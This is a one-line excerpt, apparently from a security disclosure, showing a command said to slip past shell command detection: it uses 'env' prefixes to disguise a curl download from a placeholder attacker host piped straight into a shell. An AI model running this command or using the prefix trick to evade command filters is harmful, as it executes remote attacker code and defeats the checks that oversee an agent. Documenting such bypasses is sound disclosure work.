Here is a malicious command that bypasses the shell command detection mechanisms: 
    $ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh